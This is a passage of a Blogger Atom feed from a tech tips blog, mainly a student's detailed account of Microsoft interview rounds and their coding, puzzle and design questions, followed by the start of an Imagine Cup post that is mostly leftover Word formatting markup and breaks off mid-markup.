<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1561084088417243739</id><updated>2011-12-29T08:56:10.181-08:00</updated><category term='windows'/><category term='Trivia&apos;s'/><category term='general'/><category term='HACKING'/><category term='DOWNLOADS'/><category term='tricks n tips'/><title type='text'>TECH TIPS N TRICKS</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>60</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-5931399209121716626</id><published>2011-12-29T08:52:00.001-08:00</published><updated>2011-12-29T08:52:43.853-08:00</updated><title type='text'>Interview Experince at Microsoft</title><content type='html'>Hope this note helps my juniors and the fellow MSPs  who are going to appear for the interviews in the first week of  2011.First and foremost whether you get selected or not an interview experience In Microsoft  is definitely worth remembering – its an outta world  experience  coding in a  white  board at a persons  office . On 22nd Dec 2011 – I went to IDC . there were around 45-50 people  . All of them  had cleared the written tests . they were from colleges like VIT, KIT, DCE, Amity , NIT Warangal,etc . On the basis of the written tests I guess  we were separated into 2 groups . 15 of us  had personal one-to-one interviews schedeuled the rest of them were subjected to group interviews . I was in the first  group . We were led to a conference hall where we were seated . Turn by turn few employees were coming to that  room and calling the  candidates name  . the  interviews were taking place at their individual office’s . First interview :A young looking guy   wearing a black tee and jeans  called meInterviewer : hie  , I am shomik. I will  be  interviewing  u  today . Want some coffee before we get get started.Me:  No, I ma ok .Interviewer : tell Me about  ur self ?    (  I replied talked about my school college ,  projects ,  y I like coding)Interviewer :  what about  ur  hobbies ?  ( I  told him watching cricket ,  music ,  blogging )Interviewer :  u listen to Mettalica ? (   I  replied  Nope I ma  not much in  metal  )He  pointed at his black tee  and  said  it was his fav  band .Interviewer :   u no  sorting  ? (  me : yes)Interviewer :   y is it required ?  name few  methods? What is internal and external  sorting  ?(Me I replied ll thye 3  questions  very well)Interviewer :  Dun call me ‘sir’   . call me shomik . Now  tell me which is the most  efficient sorting  among the ones  u  mentioned ?Interviewer :   Given 2 sorted arrays .Merge  them at o(n)  time ?Interviewer :   u no link list  right ( I said  yes)Interviewer :   reverse a link list without using  extra  space? How would u detect a loop in a link list ? how would u find where the loop  has  started ?(I replied  all of them and wrote the codes too )Interviewer :   how would u add 2 polynomials using  link  list ?Interviewer :   construct a Hash  function for mapping all the characters( ASCII 1-128) . How  would u detect the frequency of each  character in a string using this  function ?( I answered all these)He was pleased . he replied .Interviewer :   u don’t look  like a geek u no that .u look like the pubbing sort of guy  but  ur base is pretty good .Interviewer :   ok tell me one  area u are weak on and  tell me frankly (I said  OS )Interviewer :   Ur fav Microsft product ? (i said Ms word) c   thanks  for ur time arka . !!TOTAL Interview time  1 hour  Then I got a break of 10 mins  The second interviewer was a middle aged serious looking ladyInterviewer: tell me about  ur self ?  your final year project ? which platform u used ? etc etcInterviewer :  can u  solve this  problemInput:0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15a longest increasing subsequence is0, 2, 6, 9, 13, 15.Me : told her the algo coded on white boardInterviewer : what is tree? Few uses of them ? code to print the data in the leaf nodes of a treeInterviewer : What is AVL tree? Y it is used ? Write a code to balance an unbalanced  AVL tree ?Interviewer : generate a tic toe game  ?  (me did this)  Implement it in such a way that the computer never loses (me  couldn’t do it )Interviewer : Write the code for Finding all possible unique Paths in  a Forest ? (tried  it but wasn’t  fully  successful )Interviewer : Display all the branches of a tree as separate link lists ?Interviewer :Enter a paragraph find the max occurring character and its  frequency (DO NOT USE MOR THAN O(n) time   ie  1 for loop only)   Me:did it it was easyInterviewer :ALgo of Depth first and Breadth first serch . DURATIOn : 1 hr  20 Mins    it was my longest interview  for the dayINTERVIEW  3Interviewer :  some intro   asked about  compilers assemblers ,the  step by step compiling  process etcInterviewer :  I have a file of n lines ( I dunt no what N is ) I want to print the last 3 lines . how ?Interviewer : what is memory binding ?Interviewer : DMA , asked me about semaphores ,  write algo for semaphores Interviewer : asked me about  file systems . FAT32 , NTFs (could only tell the full forms .)  then it was overDuration : 20 Mins   STAY TUNED FOR THE MSIT QUSTIONS------------------------------------------------------------------------------ MSIT I was assigned a recruiter . Remember recruiter is  your best friend he will decide  which  people  are gonna interview you  so be frank with him  . tell him about  area of strengths and weakness.You will be asked to fill up a form in which you have to select the positions for which you want to apply.You can apply for ANYONE or BOTH .1.SDET and SDE  - requires knowledge of testing , test cases , programming logic ,product features2 Service Engineer –requires knowledge of DBMS , networking , deployment of Softwares . You will be offered 3 to 4 interviews .your selection or rejection would depend upon ALL these interviews. I asked him (my recruiter) what whether applying to both would mean I have extra chance . My recruiter advised me Not to apply for  “Service engineer “ Post as I MIGHT (might not also) get 1 interview with the Service management team and if it dint go well it would jeopardize my Chances for the SDE and SDET post as well . And also I am not very good in  database .they ask a lot of question’s from Microsoft access OLEB connections  data objects , the recruiter told me that  . So me  along with the candidates only applied for SDET and SDE post . Interview 4 (first of MSIT) ( 45 Mins) Interviewer : Hie I am shashk  . where are you  from ?Interviewer : Watched MI 4  ?   ( I replied no )Interviewer : let me   give a puzzle  ull enjoy  solving it .4 man have to cross a bridge only 2 at a time . they have I torch with them and the torch must be carried by any pair or single person while crossing the bridge . tom cruise being the super hero takes 1 min, the other 2 guys take 2 min and 5 mins .finally Anil kapoor takes 10 mins . there is a Time Bomb fixed which will  go off in 17 mins .Divide a way so that all 4 of them crosses .( TOOK A Hell lot of a time for me to solve   this )Interviewer :  What are the next three numbers in this series?4, 6, 12, 18, 30, 42, 60, 72, 102, 108, ?, ?, ?(DID This  it was Easy)Interviewer: Every man in a village of 100 married couples has cheated on his wife. Every wife in the village instantly knows when a man other than her husband has cheated, but does not know when her own husband has. The village has a law that does not allow for adultery. Any wife who can prove that her husband is unfaithful must kill him that very day. The women of the village would never disobey this law. One day, the queen of the village visits and announces that at least one husband has been unfaithful. What happens?ME :   assemble all the women in a place and all the husbands also . the women who doesn’t not see any culprit ,her husband is the culprit.(while answering this question I inadvertently used the word “sex” ones or  twice . the interviwer told me to use the Word “sleep” instead :P )Interviewer:  how  would you test a web browser ?Interviewer: design a Spice rack for the Blind . ( was prepared for this question from beginning .saw it I geek for geeks) Interviewer: Find the greater of the 2 numbers in 1 step without using if or any sort of comparison(me :  couldn’t do this ).Interviewer: Add 2 numbers without using “+” sign .(me : did this  using bit manipulation )Interviewer: Design test cases for a Aero plane navigation Navigation system . (couldn’t answer this well) Interviewer: find whther a number is a Power of 2 in constant time o(1) . (again a bit manipulation program)Interviewer: Given a chance between development and testing which would u prefer . (me :testing  ..)Interviewer:What are enumerations on Object oriented programming ( Me :  sir I don’t know )Interviewer: Can  you write c # code  . (Me : no  but I can  learn as it is very similar to java )Interviewer: Any questions for me . (Me : No sir ) Interview 5 (2nd for MSIT )  ( 50 Mins)Interviewer: Hie   I was not actually prepared for this interview .Interviewer: show me ur resume .  (started asking qustions from it ) I had written subject of interest as Cloud . so  he asked few questions from that .Interviewer: advantage of cloud. In a country like India where bandwidth is low can u suggest me some other solution other than  cloud . (me  I coudnt answer this one )Interviewer: Do you no what is L value R Value in programming ? ( Me : no sir )Interviewer: Okii . design an ATm for me and write what features you will implement there ?Interviewer: Now  design atleast 3 test cases where your system will fail . (me : did it ) Interviewer: suppose I am running out of time which model of software development I should use( Me : Rad Model .  went on to describe it  )Interviewer: any drawbacks of this Model ( Me :  told him )Interviewer: design a system for the allocation of bandwidth in a college WIFI . How would the system react in case of high stress condition .   suppose the director and a student logs into his account Implement a feature  such that the director will   get the prority and  higher speed while browsing .(Me  : I  used labels here numbered  from 1 to 7 . 7  being of higesht prority .  whenever a request come s  the label is checked if a lower prority user is  using the wifi   he is immediately  premted to make space  for the higher prority  browser . etc etc   download limiter , high traffic algorithm .   designed many features )Interviewer: How would you divide the above system into Modules for separate engineers to code ?Interviewer: If you had to add 2 new features to the website Rapidshare .com what would they be ?  Interviewer: design the UI of a Dvd player .Then  he asked me   some basic queries ,Interviewer: ok I am  done  with . You seem tired  . have a coffee .We chatted and walked till  the coffee enclosure . then  he   went  to his  office . I  gave a call to my recruiter  to   arrange for the next  interview . INTERVIEW 6 : (3rd for MSIT) ( 1 hour )Interviewer: where are you from arka ? how  did you  come ?   Tell me   about  your self .Interviewer: See I have designed a New aircraft and before  using it for   carry passengers I have  given you the contract for  testing it and ensuring thorough safety of the passengers . How  would you  do that .?(Me :  told  him about   various measures I will take , engine safety , presuurized cabins ..    etc etc  )Interviewer: write a program which will take 10 characters and find the most occurring character . I did( he gave the input AAddam and said what will be the out put .   I had not taken capital and small into account  so   the program would have given   d .)Interviewer:  correct the  code .  ( me :  this   time I was fully  correct )Interviewer:  Now  break the  code .  give an  Input   so  that the program wont give   right out output .Me: ( I  thought  for long  and  finaaly  I   gave a string of spaces )Interviewer:One new feature you would like to see in Visual studio 2011 .  ( coudnt answer this  one )Interviewer:   what are break points in code   . ( Me  coudnt answer this one also)Interviewer: have you seen the UI of windows phone 7 ?  ( Me  : yes)Interviewer:  Do  you  like    it  ? (Me : No  sir  , But it’s a personal Opinion )Interviewer: Which is the Best Phone UI  you have seen ?  ( Me :  sir I phone 4 without  doubt )Interviewer: I agree with you  but we are catching up pretty fast.Interviewer: Suppose we have to out do Apple in the Ipod  Market and you are told  to design the features of a New Ipod like  device .what features would  u implement ?   he  gave me a pen  and led me to the white board to    draw   it .(Me:  I answered this pretty well . He  seemed  impressed finally )Interviewer:  thank you arka   INTERVIEW 7 ( 30 Mins)Just  when  I thought the interview  was over . My recruiter told me the Director of MSIT wanted to interview  one of the candidates . there were only 3  candidates that time ( ALL MSPS). since the other were already in interviews  he  took  me to a big  cabin .  he  first  went  inside I was standing at the door . he came out  took me in with Him introduced me to him and left  . the interviewer was a old man late  50’s I guess .Interviewer: So did  you like the campus ?(Me :yes sir )Interviewer: We  Dont have a dress code here .do you no  y? ( Me  : no)He  went on to tell how MSIT is like a small family how the MSITians very close to each other . the work culture there etc etcI was Damn tired and pretty nervous also .So I listened patientlyInterviewer: If not Microsoft  then .  ( Me :  I am planning to Do Ms   from USA  , then again I will try  in Microsoft )Interviewer:  you seem very passionate about Microsoft . y is it so  . ( I went on to tell him  how   windows 95  start screen is  etched in  my childhood memories  .  went on to talk  about Bill gates  , his  charity  how  he as a human being  inspired me   , den  the famous  video of Steve Ballmer shouting developer developer” )Interviewer:   (He pointed me to one of the photos on the wall there were 3 people in it . One was the interviewer , then standing beside was a very young steve ball mer , and the third person I could not recognize .)  Can u recognize  the  3 persons  in the picture ?   I  couldn’t recognize  the  third one . he told me  about it .Interviewer: Suppose I  told you  to Move Mount Everest how would u  do ?(Me : Sir I would stand in front of it and move  back wards    . then the Mountain will move relative to me ) Interviewer: Suppose you are in a team . 2 of your members are constantly failing behind in  their deadlines  what  would  you   do  ?Interviewer: which languages you are competent in ? write a program  to accept a string and  print it in all these languages .Interviewer: how were your earlier interviews ( Me : quite good sir )Interviewer: whats  your age ? ( Me:21 Sir)Interviewer: I joined Ms  when I was  30 .you are quite young and have a long way to  go .  don’t be disappointed if you cant make it this  time . And Best of luck for  your future  ventures .  IF I REMEMBER ANY MORE QUESTIONS I WILL ADD THEM . IF YOU THINK THIS WAS OF HELP TO  YOU PLEASE LEAVE A ONE LINE  COMMENT . iT  TOOK ME  A LOT OF TIME TO TYPE  ALL THESE . BEST OF LUCK  GUYS !!!!    HOPE THIS TIME MANY MSPS MAKE IT THROUGH&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-5931399209121716626?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/5931399209121716626/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2011/12/interview-experince-at-microsoft.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5931399209121716626'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5931399209121716626'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2011/12/interview-experince-at-microsoft.html' title='Interview Experince at Microsoft'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-8283416420512398050</id><published>2009-11-30T14:44:00.000-08:00</published><updated>2009-12-08T08:20:16.284-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>MICROSOFT IMAGINE CUP</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/SxRK_pnVPNI/AAAAAAAAAMQ/lykzmd5IojU/s1600/imagine+cup.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 118px;" src="http://2.bp.blogspot.com/_T53992hHLOM/SxRK_pnVPNI/AAAAAAAAAMQ/lykzmd5IojU/s400/imagine+cup.jpg" alt="" id="BLOGGER_PHOTO_ID_5410031509741845714" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 12"&gt;&lt;meta name="Originator" content="Microsoft Word 12"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5CADMINI%7E1%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;o:officedocumentsettings&gt;   &lt;o:relyonvml/&gt;   &lt;o:allowpng/&gt;  &lt;/o:OfficeDocumentSettings&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;link rel="themeData" href="file:///C:%5CDOCUME%7E1%5CADMINI%7E1%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_themedata.thmx"&gt;&lt;link rel="colorSchemeMapping" href="file:///C:%5CDOCUME%7E1%5CADMINI%7E1%5CLOCALS%7E1%5CTemp%5Cmsohtmlclip1%5C01%5Cclip_colorschememapping.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:trackmoves/&gt;   &lt;w:trackformatting/&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:donotpromoteqf/&gt;   &lt;w:lidthemeother&gt;EN-US&lt;/w:LidThemeOther&gt;   &lt;w:lidthemeasian&gt;X-NONE&lt;/w:LidThemeAsian&gt;   &lt;w:lidthemecomplexscript&gt;X-NONE&lt;/w:LidThemeComplexScript&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;    &lt;w:splitpgbreakandparamark/&gt;    &lt;w:dontvertaligncellwithsp/&gt;    &lt;w:dontbreakconstrainedforcedtables/&gt;    &lt;w:dontvertalignintxbx/&gt;    &lt;w:word11kerningpairs/&gt;    &lt;w:cachedcolbalance/&gt;    &lt;w:usefelayout/&gt;   &lt;/w:Compatibility&gt;   &lt;m:mathpr&gt;    &lt;m:mathfont val="Cambria Math"&gt;    &lt;m:brkbin val="before"&gt;    &lt;m:brkbinsub val="--"&gt;    &lt;m:smallfrac val="off"&gt;    &lt;m:dispdef/&gt;    &lt;m:lmargin val="0"&gt;    &lt;m:rmargin val="0"&gt;    &lt;m:defjc val="centerGroup"&gt;    &lt;m:wrapindent val="1440"&gt;    &lt;m:intlim val="subSup"&gt;    &lt;m:narylim val="undOvr"&gt;   &lt;/m:mathPr&gt;&lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" defunhidewhenused="true" defsemihidden="true" defqformat="false" defpriority="99" latentstylecount="267"&gt;   &lt;w:lsdexception locked="false" priority="0" semihidden="false" unhidewhenused="false" qformat="true" name="Normal"&gt;   &lt;w:lsdexception locked="false" priority="9" semihidden="false" unhidewhenused="false" qformat="true" name="heading 1"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 1"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 2"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 3"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 4"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 5"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 6"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 7"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 8"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 9"&gt;   &lt;w:lsdexception locked="false" priority="35" qformat="true" name="caption"&gt;   &lt;w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"&gt;   &lt;w:lsdexception locked="false" priority="1" name="Default Paragraph Font"&gt;   &lt;w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"&gt;   &lt;w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"&gt;   &lt;w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"&gt;   &lt;w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Revision"&gt;   &lt;w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"&gt;   &lt;w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"&gt;   &lt;w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List 